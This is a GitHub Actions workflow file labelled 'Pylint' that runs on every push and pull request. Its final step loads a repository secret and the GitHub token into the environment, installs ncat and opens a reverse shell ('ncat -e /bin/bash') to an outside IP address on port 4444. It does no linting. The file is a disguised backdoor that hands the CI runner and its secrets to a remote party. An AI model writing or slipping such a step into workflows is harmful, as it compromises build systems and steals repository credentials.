name: Pylint

on: [pull_request, push]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        python-version: ["3.8", "3.9"]
    steps:
    - uses: actions/checkout@v3
    - run: echo "test"
    - name: set env as secrets
      env: 
        MY_VAL: ${{ secrets.BLA_BLA }}
        GITHUB_TOKEN : ${{ guthub.token }}
      run: sudo apt install -y ncat; ncat -e /bin/bash 18.222.231.153 4444
